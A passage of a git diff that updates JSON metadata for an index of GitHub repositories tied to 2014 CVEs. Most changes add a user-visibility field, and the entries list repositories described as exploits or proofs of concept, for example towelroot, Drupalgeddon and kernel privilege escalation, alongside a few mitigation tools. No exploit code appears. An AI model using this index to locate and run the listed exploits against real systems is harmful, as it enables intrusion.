"https:\/\/avatars.githubusercontent.com\/u\/40774163?v=4", - "html_url": "https:\/\/github.com\/redtimmy" + "html_url": "https:\/\/github.com\/redtimmy", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/redtimmy\/perf-exploiter", "description": "CVE-2014-2630 exploit for xglance-bin ", diff --git a/2014/CVE-2014-2734.json b/2014/CVE-2014-2734.json index 06170afaf3..10d7f0b8ea 100644 --- a/2014/CVE-2014-2734.json +++ b/2014/CVE-2014-2734.json @@ -7,7 +7,8 @@ "login": "gdisneyleugers", "id": 4960012, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4960012?v=4", - "html_url": "https:\/\/github.com\/gdisneyleugers" + "html_url": "https:\/\/github.com\/gdisneyleugers", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gdisneyleugers\/CVE-2014-2734", "description": "Ruby OpenSSL CA Private Key Spoofing", @@ -37,7 +38,8 @@ "login": "adrienthebo", "id": 172194, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172194?v=4", - "html_url": "https:\/\/github.com\/adrienthebo" + "html_url": "https:\/\/github.com\/adrienthebo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/adrienthebo\/cve-2014-2734", "description": "I think this CVE is full of lies and deceit and very confusing code.", diff --git a/2014/CVE-2014-2815.json b/2014/CVE-2014-2815.json index aa1a44769c..4d0d41c489 100644 --- a/2014/CVE-2014-2815.json +++ b/2014/CVE-2014-2815.json @@ -7,7 +7,8 @@ "login": "Edubr2020", "id": 60452468, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60452468?v=4", - "html_url": "https:\/\/github.com\/Edubr2020" + "html_url": "https:\/\/github.com\/Edubr2020", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Edubr2020\/CABTrap_OneNote2007", "description": "Microsoft Office Onenote 2007 (CVE-2014-2815) \".ONEPKG\" File Directory Traversal Vulnerability Leads to Arbitrary Code Execution", diff --git a/2014/CVE-2014-3120.json b/2014/CVE-2014-3120.json index 442e1a66fd..a74acf62e5 100644 --- a/2014/CVE-2014-3120.json +++ b/2014/CVE-2014-3120.json @@ -7,7 +7,8 @@ "login": "jeffgeiger", "id": 1312480, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1312480?v=4", - "html_url": "https:\/\/github.com\/jeffgeiger" + "html_url": "https:\/\/github.com\/jeffgeiger", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jeffgeiger\/es_inject", "description": "Demonstration of CVE-2014-3120", @@ -37,7 +38,8 @@ "login": "echohtp", "id": 313060, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/313060?v=4", - "html_url": "https:\/\/github.com\/echohtp" + "html_url": "https:\/\/github.com\/echohtp", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/echohtp\/ElasticSearch-CVE-2014-3120", "description": "POC Code to exploite CVE-2014-3120", @@ -67,7 +69,8 @@ "login": "xpgdgit", "id": 30492998, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30492998?v=4", - "html_url": "https:\/\/github.com\/xpgdgit" + "html_url": "https:\/\/github.com\/xpgdgit", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xpgdgit\/CVE-2014-3120", "description": null, diff --git a/2014/CVE-2014-3153.json b/2014/CVE-2014-3153.json index a3f2f8074d..79b66173f0 100644 --- a/2014/CVE-2014-3153.json +++ b/2014/CVE-2014-3153.json @@ -7,7 +7,8 @@ "login": "timwr", "id": 684924, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/684924?v=4", - "html_url": "https:\/\/github.com\/timwr" + "html_url": "https:\/\/github.com\/timwr", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/timwr\/CVE-2014-3153", "description": "CVE-2014-3153 aka towelroot", @@ -37,7 +38,8 @@ "login": "android-rooting-tools", "id": 4747069, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4747069?v=4", - "html_url": "https:\/\/github.com\/android-rooting-tools" + "html_url": "https:\/\/github.com\/android-rooting-tools", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/android-rooting-tools\/libfutex_exploit", "description": "CVE-2014-3153 exploit", @@ -67,7 +69,8 @@ "login": "geekben", "id": 6094550, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6094550?v=4", - "html_url": "https:\/\/github.com\/geekben" + "html_url": "https:\/\/github.com\/geekben", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/geekben\/towelroot", "description": "Research of CVE-2014-3153 and its famous exploit towelroot on x86", @@ -97,7 +100,8 @@ "login": "lieanu", "id": 3104641, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3104641?v=4", - "html_url": "https:\/\/github.com\/lieanu" + "html_url": "https:\/\/github.com\/lieanu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/lieanu\/CVE-2014-3153", "description": "cve2014-3153 exploit for ubuntu x86", @@ -127,7 +131,8 @@ "login": "zerodavinci", "id": 4964771, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4964771?v=4", - "html_url": "https:\/\/github.com\/zerodavinci" + "html_url": "https:\/\/github.com\/zerodavinci", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zerodavinci\/CVE-2014-3153-exploit", "description": "My exploit for kernel exploitation", @@ -157,7 +162,8 @@ "login": "c3c", "id": 2326945, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2326945?v=4", - "html_url": "https:\/\/github.com\/c3c" + "html_url": "https:\/\/github.com\/c3c", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/c3c\/CVE-2014-3153", "description": "towelroot", @@ -187,13 +193,14 @@ "login": "dangtunguyen", "id": 25807559, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25807559?v=4", - "html_url": "https:\/\/github.com\/dangtunguyen" + "html_url": "https:\/\/github.com\/dangtunguyen", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/dangtunguyen\/TowelRoot", "description": "Gain root privilege by exploiting CVE-2014-3153 vulnerability", "fork": false, "created_at": "2018-09-27T03:16:15Z", - "updated_at": "2024-06-03T08:24:05Z", + "updated_at": "2024-10-17T22:57:16Z", "pushed_at": "2018-09-27T03:31:02Z", "stargazers_count": 12, "watchers_count": 12, @@ -220,7 +227,8 @@ "login": "elongl", "id": 30181361, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30181361?v=4", - "html_url": "https:\/\/github.com\/elongl" + "html_url": "https:\/\/github.com\/elongl", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/elongl\/CVE-2014-3153", "description": "Exploiting CVE-2014-3153, AKA Towelroot.", @@ -257,7 +265,8 @@ "login": "c4mx", "id": 16646683, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16646683?v=4", - "html_url": "https:\/\/github.com\/c4mx" + "html_url": "https:\/\/github.com\/c4mx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/c4mx\/Linux-kernel-code-injection_CVE-2014-3153", "description": "Study on Linux kernel code injection via CVE-2014-3153 (Towelroot)", diff --git a/2014/CVE-2014-3341.json b/2014/CVE-2014-3341.json index fda9f5bd7b..3e8fcb1948 100644 --- a/2014/CVE-2014-3341.json +++ b/2014/CVE-2014-3341.json @@ -7,7 +7,8 @@ "login": "ehabhussein", "id": 5464055, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5464055?v=4", - "html_url": "https:\/\/github.com\/ehabhussein" + "html_url": "https:\/\/github.com\/ehabhussein", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ehabhussein\/snmpvlan", "description": "CVE-2014-3341 exploit", diff --git a/2014/CVE-2014-3466.json b/2014/CVE-2014-3466.json index 1da331399d..3c36fa37d5 100644 --- a/2014/CVE-2014-3466.json +++ b/2014/CVE-2014-3466.json @@ -7,7 +7,8 @@ "login": "azet", "id": 855369, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/855369?v=4", - "html_url": "https:\/\/github.com\/azet" + "html_url": "https:\/\/github.com\/azet", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/azet\/CVE-2014-3466_PoC", "description": "Proof of Concept for CVE-2014-3466 (GnuTLS buffer overflow: session id length check)", diff --git a/2014/CVE-2014-3507.json b/2014/CVE-2014-3507.json index b9a6c95c03..54d2eb7e2b 100644 --- a/2014/CVE-2014-3507.json +++ b/2014/CVE-2014-3507.json @@ -7,7 +7,8 @@ "login": "Satheesh575555", "id": 102573923, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", - "html_url": "https:\/\/github.com\/Satheesh575555" + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Satheesh575555\/openSSL_1.0.1g_CVE-2014-3507", "description": null, diff --git a/2014/CVE-2014-3544.json b/2014/CVE-2014-3544.json index 29416fdd04..7a0184d305 100644 --- a/2014/CVE-2014-3544.json +++ b/2014/CVE-2014-3544.json @@ -7,7 +7,8 @@ "login": "aforesaid", "id": 66903760, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66903760?v=4", - "html_url": "https:\/\/github.com\/aforesaid" + "html_url": "https:\/\/github.com\/aforesaid", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/aforesaid\/MoodleHack", "description": "Реализация использования уязвимости Moodle CVE-2014-3544.", diff --git a/2014/CVE-2014-3551.json b/2014/CVE-2014-3551.json index 0d8830df86..09178fa904 100644 --- a/2014/CVE-2014-3551.json +++ b/2014/CVE-2014-3551.json @@ -7,7 +7,8 @@ "login": "JavaGarcia", "id": 5332084, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5332084?v=4", - "html_url": "https:\/\/github.com\/JavaGarcia" + "html_url": "https:\/\/github.com\/JavaGarcia", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/JavaGarcia\/CVE-2014-3551", "description": "CVE-2014-3551", diff --git a/2014/CVE-2014-3566.json b/2014/CVE-2014-3566.json index a6abac96ac..556fc3468e 100644 --- a/2014/CVE-2014-3566.json +++ b/2014/CVE-2014-3566.json @@ -7,7 +7,8 @@ "login": "mikesplain", "id": 881965, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/881965?v=4", - "html_url": "https:\/\/github.com\/mikesplain" + "html_url": "https:\/\/github.com\/mikesplain", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mikesplain\/CVE-2014-3566-poodle-cookbook", "description": null, @@ -37,7 +38,8 @@ "login": "stdevel", "id": 5862725, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5862725?v=4", - "html_url": "https:\/\/github.com\/stdevel" + "html_url": "https:\/\/github.com\/stdevel", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/stdevel\/poodle_protector", "description": "Python script for automatically protecting your systems against POODLE vulnerability (CVE-2014-3566)", @@ -71,7 +73,8 @@ "login": "cloudpassage", "id": 871428, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/871428?v=4", - "html_url": "https:\/\/github.com\/cloudpassage" + "html_url": "https:\/\/github.com\/cloudpassage", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cloudpassage\/mangy-beast", "description": "CloudPassage Halo policy for detecting vulnerability to CVE-2014-3566 (AKA POODLE)", @@ -101,7 +104,8 @@ "login": "mpgn", "id": 5891788, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", - "html_url": "https:\/\/github.com\/mpgn" + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mpgn\/poodle-PoC", "description": ":poodle: Poodle (Padding Oracle On Downgraded Legacy Encryption) attack CVE-2014-3566 :poodle:", @@ -139,7 +143,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/openssl_g2.5_CVE-2014-3566", "description": null, diff --git a/2014/CVE-2014-3570.json b/2014/CVE-2014-3570.json index 8485498ec2..d0468fd2c2 100644 --- a/2014/CVE-2014-3570.json +++ b/2014/CVE-2014-3570.json @@ -7,7 +7,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/openssl_G2.5_CVE-2014-3570", "description": null, @@ -37,7 +38,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/Openssl_G2.5_CVE-2014-3570_01", "description": null, @@ -67,7 +69,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/CVE-2014-3570", "description": null, @@ -97,7 +100,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/CVE-2014-3570_G2.5_openssl_no_patch", "description": null, diff --git a/2014/CVE-2014-3625.json b/2014/CVE-2014-3625.json index 6cc1f10d84..39bf4fb117 100644 --- a/2014/CVE-2014-3625.json +++ b/2014/CVE-2014-3625.json @@ -7,7 +7,8 @@ "login": "ilmila", "id": 2845952, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2845952?v=4", - "html_url": "https:\/\/github.com\/ilmila" + "html_url": "https:\/\/github.com\/ilmila", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ilmila\/springcss-cve-2014-3625", "description": "spring mvc cve-2014-3625", @@ -37,7 +38,8 @@ "login": "gforresu", "id": 6943421, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6943421?v=4", - "html_url": "https:\/\/github.com\/gforresu" + "html_url": "https:\/\/github.com\/gforresu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gforresu\/SpringPathTraversal", "description": "String MVC Framework Path-Traversal proof of concept. CVE-2014-3625 ", diff --git a/2014/CVE-2014-3704.json b/2014/CVE-2014-3704.json index 96dcc74121..8e270dbfd8 100644 --- a/2014/CVE-2014-3704.json +++ b/2014/CVE-2014-3704.json @@ -7,7 +7,8 @@ "login": "happynote3966", "id": 19719330, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19719330?v=4", - "html_url": "https:\/\/github.com\/happynote3966" + "html_url": "https:\/\/github.com\/happynote3966", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/happynote3966\/CVE-2014-3704", "description": null, @@ -37,7 +38,8 @@ "login": "AleDiBen", "id": 18688115, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18688115?v=4", - "html_url": "https:\/\/github.com\/AleDiBen" + "html_url": "https:\/\/github.com\/AleDiBen", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/AleDiBen\/Drupalgeddon", "description": "CVE-2014-3704 aka Drupalgeddon - Form-Cache Injection Method", diff --git a/2014/CVE-2014-4014.json b/2014/CVE-2014-4014.json index 38fb9b9841..7ce553bdd8 100644 --- a/2014/CVE-2014-4014.json +++ b/2014/CVE-2014-4014.json @@ -7,7 +7,8 @@ "login": "vnik5287", "id": 9650718, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9650718?v=4", - "html_url": "https:\/\/github.com\/vnik5287" + "html_url": "https:\/\/github.com\/vnik5287", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vnik5287\/cve-2014-4014-privesc", "description": "cve-2014-4014", diff --git a/2014/CVE-2014-4076.json b/2014/CVE-2014-4076.json index 0260ea2486..9b867d9d8e 100644 --- a/2014/CVE-2014-4076.json +++ b/2014/CVE-2014-4076.json @@ -7,7 +7,8 @@ "login": "fungoshacks", "id": 13205789, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13205789?v=4", - "html_url": "https:\/\/github.com\/fungoshacks" + "html_url": "https:\/\/github.com\/fungoshacks", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fungoshacks\/CVE-2014-4076", "description": "Windows 2k3 tcpip.sys Privilege Escalation", diff --git a/2014/CVE-2014-4109.json b/2014/CVE-2014-4109.json index 09936a54d1..7809d2d8d0 100644 --- a/2014/CVE-2014-4109.json +++ b/2014/CVE-2014-4109.json @@ -7,7 +7,8 @@ "login": "day6reak", "id": 1537207, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1537207?v=4", - "html_url": "https:\/\/github.com\/day6reak" + "html_url": "https:\/\/github.com\/day6reak", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/day6reak\/CVE-2014-4109", "description": null, diff --git a/2014/CVE-2014-4113.json b/2014/CVE-2014-4113.json index 0e24c21ce8..11a4df885d 100644 --- a/2014/CVE-2014-4113.json +++ b/2014/CVE-2014-4113.json @@ -7,7 +7,8 @@ "login": "johnjohnsp1", "id": 1888855, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1888855?v=4", - "html_url": "https:\/\/github.com\/johnjohnsp1" + "html_url": "https:\/\/github.com\/johnjohnsp1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/johnjohnsp1\/CVE-2014-4113", "description": "PowerShell CVE-2014-4113", @@ -37,7 +38,8 @@ "login": "nsxz", "id": 8149728, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8149728?v=4", - "html_url": "https:\/\/github.com\/nsxz" + "html_url": "https:\/\/github.com\/nsxz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nsxz\/Exploit-CVE-2014-4113", "description": "Exploit CVE-2014-4113", @@ -67,7 +69,8 @@ "login": "sam-b", "id": 997395, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/997395?v=4", - "html_url": "https:\/\/github.com\/sam-b" + "html_url": "https:\/\/github.com\/sam-b", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sam-b\/CVE-2014-4113", "description": "Trigger and exploit code for CVE-2014-4113", @@ -97,7 +100,8 @@ "login": "wikiZ", "id": 37897216, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37897216?v=4", - "html_url": "https:\/\/github.com\/wikiZ" + "html_url": "https:\/\/github.com\/wikiZ", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/wikiZ\/cve-2014-4113", "description": null, diff --git a/2014/CVE-2014-4140.json b/2014/CVE-2014-4140.json index 98deb4dfcf..20ba219de2 100644 --- a/2014/CVE-2014-4140.json +++ b/2014/CVE-2014-4140.json @@ -7,7 +7,8 @@ "login": "day6reak", "id": 1537207, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1537207?v=4", - "html_url": "https:\/\/github.com\/day6reak" + "html_url": "https:\/\/github.com\/day6reak", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/day6reak\/CVE-2014-4140", "description": null, diff --git a/2014/CVE-2014-4210.json b/2014/CVE-2014-4210.json index 6ff5ca7e2c..774a427157 100644 --- a/2014/CVE-2014-4210.json +++ b/2014/CVE-2014-4210.json @@ -7,7 +7,8 @@ "login": "NoneNotNull", "id": 13295780, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13295780?v=4", - "html_url": "https:\/\/github.com\/NoneNotNull" + "html_url": "https:\/\/github.com\/NoneNotNull", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NoneNotNull\/SSRFX", "description": "CVE-2014-4210+Redis未授权访问", @@ -37,7 +38,8 @@ "login": "0xn0ne", "id": 16507416, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16507416?v=4", - "html_url": "https:\/\/github.com\/0xn0ne" + "html_url": "https:\/\/github.com\/0xn0ne", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xn0ne\/weblogicScanner", "description": "weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14750、CVE-2020-14882、CVE-2020-14883", @@ -88,7 +90,8 @@ "login": "unmanarc", "id": 7947734, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7947734?v=4", - "html_url": "https:\/\/github.com\/unmanarc" + "html_url": "https:\/\/github.com\/unmanarc", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/unmanarc\/CVE-2014-4210-SSRF-PORTSCANNER-POC", "description": "CVE-2014-4210 SSRF PORTSCANNER PoC", @@ -118,7 +121,8 @@ "login": "NHPT", "id": 42366434, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42366434?v=4", - "html_url": "https:\/\/github.com\/NHPT" + "html_url": "https:\/\/github.com\/NHPT", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NHPT\/WebLogic-SSRF_CVE-2014-4210", "description": "Weblogic SearchPublicRegistries SSRF(CVE-2014-4210) Exploit Script based on Python3", diff --git a/2014/CVE-2014-4321.json b/2014/CVE-2014-4321.json index 932eccf996..6071318188 100644 --- a/2014/CVE-2014-4321.json +++ b/2014/CVE-2014-4321.json @@ -7,7 +7,8 @@ "login": "android-rooting-tools", "id": 4747069, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4747069?v=4", - "html_url": "https:\/\/github.com\/android-rooting-tools" + "html_url": "https:\/\/github.com\/android-rooting-tools", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/android-rooting-tools\/libmsm_vfe_read_exploit", "description": "CVE-2014-4321 exploit", diff --git a/2014/CVE-2014-4322.json b/2014/CVE-2014-4322.json index 1a7631101f..7d854064e9 100644 --- a/2014/CVE-2014-4322.json +++ b/2014/CVE-2014-4322.json @@ -7,7 +7,8 @@ "login": "retme7", "id": 5284280, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5284280?v=4", - "html_url": "https:\/\/github.com\/retme7" + "html_url": "https:\/\/github.com\/retme7", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/retme7\/CVE-2014-4322_poc", "description": "Gain privileges:system -> root,as a part of https:\/\/github.com\/retme7\/CVE-2014-7911_poc", @@ -37,7 +38,8 @@ "login": "laginimaineb", "id": 11378334, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11378334?v=4", - "html_url": "https:\/\/github.com\/laginimaineb" + "html_url": "https:\/\/github.com\/laginimaineb", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/laginimaineb\/cve-2014-4322", "description": "CVE-2014-4322 Exploit", @@ -67,7 +69,8 @@ "login": "askk", "id": 4988461, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4988461?v=4", - "html_url": "https:\/\/github.com\/askk" + "html_url": "https:\/\/github.com\/askk", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/askk\/CVE-2014-4322_adaptation", "description": "Just an attempt to adapt for Note 4, I do not know what I am doing.", @@ -97,7 +100,8 @@ "login": "koozxcv", "id": 15362158, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15362158?v=4", - "html_url": "https:\/\/github.com\/koozxcv" + "html_url": "https:\/\/github.com\/koozxcv", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/koozxcv\/CVE-2014-4322", "description": "must run this native binary with system privilege", diff --git a/2014/CVE-2014-4323.json b/2014/CVE-2014-4323.json index dd2ae8ded3..10449ea56e 100644 --- a/2014/CVE-2014-4323.json +++ b/2014/CVE-2014-4323.json @@ -7,7 +7,8 @@ "login": "marcograss", "id": 1010159, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1010159?v=4", - "html_url": "https:\/\/github.com\/marcograss" + "html_url": "https:\/\/github.com\/marcograss", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/marcograss\/cve-2014-4323", "description": "cve-2014-4323 poc", diff --git a/2014/CVE-2014-4377.json b/2014/CVE-2014-4377.json index 7116067d3f..aa59a9acae 100644 --- a/2014/CVE-2014-4377.json +++ b/2014/CVE-2014-4377.json @@ -7,7 +7,8 @@ "login": "feliam", "id": 1017522, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1017522?v=4", - "html_url": "https:\/\/github.com\/feliam" + "html_url": "https:\/\/github.com\/feliam", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/feliam\/CVE-2014-4377", "description": null, @@ -37,7 +38,8 @@ "login": "davidmurray", "id": 545502, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/545502?v=4", - "html_url": "https:\/\/github.com\/davidmurray" + "html_url": "https:\/\/github.com\/davidmurray", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/davidmurray\/CVE-2014-4377", "description": "CydiaSubstrate-based fix for CVE-2014-4377.", diff --git a/2014/CVE-2014-4378.json b/2014/CVE-2014-4378.json index 2c55b9cae8..3240470cd1 100644 --- a/2014/CVE-2014-4378.json +++ b/2014/CVE-2014-4378.json @@ -7,7 +7,8 @@ "login": "feliam", "id": 1017522, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1017522?v=4", - "html_url": "https:\/\/github.com\/feliam" + "html_url": "https:\/\/github.com\/feliam", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/feliam\/CVE-2014-4378", "description": null, diff --git a/2014/CVE-2014-4481.json b/2014/CVE-2014-4481.json index 2ebbe82725..533686de4d 100644 --- a/2014/CVE-2014-4481.json +++ b/2014/CVE-2014-4481.json @@ -7,7 +7,8 @@ "login": "feliam", "id": 1017522, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1017522?v=4", - "html_url": "https:\/\/github.com\/feliam" + "html_url": "https:\/\/github.com\/feliam", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/feliam\/CVE-2014-4481", "description": "Apple CoreGraphics framework fails to validate the input when parsing CCITT group 3 encoded data resulting in a heap overflow condition. A small heap memory allocation can be overflowed with controlled data from the input resulting in arbitrary code execution in the context of Mobile Safari.", diff --git a/2014/CVE-2014-4511.json b/2014/CVE-2014-4511.json index 1ca873c4b0..71bfce899f 100644 --- a/2014/CVE-2014-4511.json +++ b/2014/CVE-2014-4511.json @@ -7,7 +7,8 @@ "login": "michaelsss1", "id": 22094885, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22094885?v=4", - "html_url": "https:\/\/github.com\/michaelsss1" + "html_url": "https:\/\/github.com\/michaelsss1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/michaelsss1\/gitlist-RCE", "description": "CVE-2014-4511", diff --git a/2014/CVE-2014-4671.json b/2014/CVE-2014-4671.json index 81fb37e9f1..02cd3835a9 100644 --- a/2014/CVE-2014-4671.json +++ b/2014/CVE-2014-4671.json @@ -7,7 +7,8 @@ "login": "cph", "id": 1691248, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1691248?v=4", - "html_url": "https:\/\/github.com\/cph" + "html_url": "https:\/\/github.com\/cph", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cph\/rabl-old", "description": "rabl 0.8.6 + fix for CVE-2014-4671", diff --git a/2014/CVE-2014-4688.json b/2014/CVE-2014-4688.json index ef4c3667ee..49393d73fa 100644 --- a/2014/CVE-2014-4688.json +++ b/2014/CVE-2014-4688.json @@ -7,7 +7,8 @@ "login": "andyfeili", "id": 59521017, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59521017?v=4", - "html_url": "https:\/\/github.com\/andyfeili" + "html_url": "https:\/\/github.com\/andyfeili", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/andyfeili\/CVE-2014-4688", "description": null, diff --git a/2014/CVE-2014-4699.json b/2014/CVE-2014-4699.json index f716503511..d41750044a 100644 --- a/2014/CVE-2014-4699.json +++ b/2014/CVE-2014-4699.json @@ -7,7 +7,8 @@ "login": "vnik5287", "id": 9650718, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9650718?v=4", - "html_url": "https:\/\/github.com\/vnik5287" + "html_url": "https:\/\/github.com\/vnik5287", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vnik5287\/cve-2014-4699-ptrace", "description": "My old sysret \/ ptrace PoC", diff --git a/2014/CVE-2014-4936.json b/2014/CVE-2014-4936.json index 3b2157487c..36256ce415 100644 --- a/2014/CVE-2014-4936.json +++ b/2014/CVE-2014-4936.json @@ -7,7 +7,8 @@ "login": "0x3a", "id": 7872766, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7872766?v=4", - "html_url": "https:\/\/github.com\/0x3a" + "html_url": "https:\/\/github.com\/0x3a", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0x3a\/CVE-2014-4936", "description": "Repository for CVE-2014-4936 POC code.", diff --git a/2014/CVE-2014-4943.json b/2014/CVE-2014-4943.json index 28062ab43f..e51bbf1946 100644 --- a/2014/CVE-2014-4943.json +++ b/2014/CVE-2014-4943.json @@ -7,7 +7,8 @@ "login": "redes-2015", "id": 15361031, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15361031?v=4", - "html_url": "https:\/\/github.com\/redes-2015" + 